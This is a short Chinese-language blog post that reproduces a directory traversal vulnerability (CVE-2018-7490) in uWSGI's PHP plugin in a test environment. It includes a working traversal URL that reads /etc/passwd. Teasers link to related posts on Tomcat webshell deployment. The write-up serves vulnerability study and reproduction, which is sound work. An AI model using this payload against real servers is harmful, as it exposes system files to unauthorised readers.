uWSGI PHP目录穿越漏洞(CVE-2018-7490)


uWSGI PHP目录穿越漏洞(CVE-2018-7490)

uWSGI 是一款 Web 应用程序服务器,它实现了 WSGI、uwsgi 和 http 等协议,并支持通过插件来运行各种语言。

uWSGI 2.0.17 之前的 PHP 插件,没有正确的处理 DOCUMENT_ROOT 检测,导致用户可以通过..%2f来跨越目录,读取或运行 DOCUMENT_ROOT 目录以外的文件。

漏洞复现

运行完成后,访问 [http://your-ip:8080/http://your-ip:8080/) 即可看到 phpinfo 信息,说明 uwsgi-php 服务器已成功运行。

访问http://your-ip:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd,成功读取文件:


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
Tomcat 弱口令导致后台 getshell Tomcat 弱口令导致后台 getshell
Tomcat 弱口令导致后台 getshell复现环境Tomcat版本:8.0 Tomcat支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+ 权
2019-03-02
下一篇 
uWSGI 未授权访问漏洞 uWSGI 未授权访问漏洞
uWSGI 未授权访问漏洞uWSGI 是一款 Web 应用程序服务器,它实现了 WSGI、uwsgi 和 http 等协议,并支持通过插件来运行各种语言,通常被用于运行 Python WEB 应用。uwsgi 除了是应用容器的名称之外,它和
2019-03-02
  目录